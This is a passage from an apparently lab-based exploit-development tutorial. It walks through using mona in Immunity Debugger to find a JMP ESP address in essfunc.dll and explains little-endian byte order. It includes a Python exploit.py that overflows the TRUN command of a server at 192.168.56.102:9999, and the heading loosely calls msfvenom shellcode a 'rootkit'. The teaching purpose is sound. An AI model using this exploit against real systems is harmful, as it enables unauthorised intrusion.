7. Generate a rootkit from metasploit msfvenom, append it to the payload without exploding the buffer
When we generate a rootkit, we first need to find an injectable memory address. In this case, we can use mona:
https://github.com/corelan/mona
It is a Python module that analyses the protections applied to loaded modules and their memory addresses.
Download it and copy mona.py to C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands\mona.py.
Restart your server and Immunity Debugger.
In the command input bar, type
!mona help
to learn how to use mona.
Let's use the modules function to look for a DLL that can be used as an endpoint. We want zero memory protections here: no ASLR, no Rebase, etc.
!mona modules
The essfunc.dll is our target.
Let's look for the memory address in essfunc.dll with the find command.
We need ffe4, the opcode bytes of the JMP ESP instruction.
You can use nasm_shell to see why we search for ffe4:
```
root@kali:/usr/share/metasploit-framework/tools# locate nasm_shell
/usr/bin/msf-nasm_shell
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
root@kali:/usr/share/metasploit-framework/tools# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP
00000000  FFE4              jmp esp
```
Back to our modules, let's try this (the closing quote after \xe4 is required):
!mona find -s "\xff\xe4" -m essfunc.dll
So we have a few addresses that can be used for the exploit. Let's choose the first one, 625011af.
Here is one of the most important things you need to know about memory address injection.
If your target is little-endian, like the x86 architecture, you need to reverse the byte order of the memory address like this: "\xaf\x11\x50\x62".
Otherwise (big-endian) it should be "\x62\x50\x11\xaf".
Check the architecture for more:
https://en.wikipedia.org/wiki/Endianness
So let's go back to Immunity Debugger.
We need to make sure that 625011af is actually reached by our payload.
We can set a breakpoint on this address to test whether our exploit is working:
Click the blue arrow button.
Enter the address.
Look for the address, right click, and add a breakpoint.
Let's run it.
exploit.py
```python
import socket
import sys


def probe(message):
    """
    Probe the server.
    :param message: request message (bytes)
    :return: void
    """
    host = "192.168.56.102"
    port = 9999
    res = None
    try:
        my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        my_socket.connect((host, port))
        my_socket.settimeout(10)  # add this to prevent the connection from freezing
        my_socket.recv(2048).decode()  # read the banner
        my_socket.send(message)
        res = my_socket.recv(2048).decode().replace("\n", "").replace("\r", "")
        my_socket.close()
        # hide the success, look for failure: we need a crash, we need failure.
        print("[success] %s:%s %s => %s" % (host, port, message, res))
    except Exception:
        # print the length instead of the payload when testing the buffer size
        print("[error] %s:%s %s => None" % (host, port, len(message)))
        raise
        # sys.exit()


def main():
    # memory address 625011af
    # shell = '\x62\x50\x11\xaf'  # big-endian order: wrong for x86
    shell = b"\xaf\x11\x50\x62"  # little-endian order for x86
    # shell = b"BBBB"  # use this first to confirm EIP is overwritten
    payload = b"TRUN ." + b"A" * 2006 + shell
    # print(payload)
    probe(payload)
    print("completed test")


if __name__ == "__main__":
    main()
```
Note that in Python 3 we have to use byte strings (b"...") to build the payload.
Otherwise, when the str is encoded as UTF-8 on the way to the socket, any character above 0x7f becomes two bytes and an extra \xc2 is inserted, shifting the address.
Let's get to the rootkit in the next chapter.
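To make the two points above concrete (little-endian packing and the str/bytes pitfall), here is an added Python example that is not part of the original page. It uses the 625011af address from the text and standard-library struct only:

```python
import struct

# Address found above with "!mona find" in essfunc.dll (taken from the page).
JMP_ESP = 0x625011AF


def pack_address(addr: int, little_endian: bool = True) -> bytes:
    """Return the 4-byte wire form of a 32-bit address.

    On a little-endian target such as x86 the least significant byte is
    stored first, which is why 0x625011af has to be written as
    b"\\xaf\\x11\\x50\\x62" in the payload rather than typed left to right.
    """
    return struct.pack("<I" if little_endian else ">I", addr)


def text_to_wire(text: str, encoding: str) -> bytes:
    """Encode a str the way it would reach the socket.

    With utf-8, every character above 0x7f becomes two bytes (a 0xc2 or 0xc3
    prefix plus a continuation byte), so the address silently grows by one
    byte and no longer lands on the saved return address. latin-1 maps each
    character to exactly one byte, which is why a bytes literal (or latin-1)
    is required when building binary payloads in Python 3.
    """
    return text.encode(encoding)


if __name__ == "__main__":
    print("little-endian:", pack_address(JMP_ESP))
    print("big-endian:   ", pack_address(JMP_ESP, little_endian=False))
    print("utf-8 str:    ", text_to_wire("\xaf\x11\x50\x62", "utf-8"))
    print("latin-1 str:  ", text_to_wire("\xaf\x11\x50\x62", "latin-1"))
```

Running it shows the utf-8 version is five bytes long while the latin-1 and bytes-literal versions are the expected four.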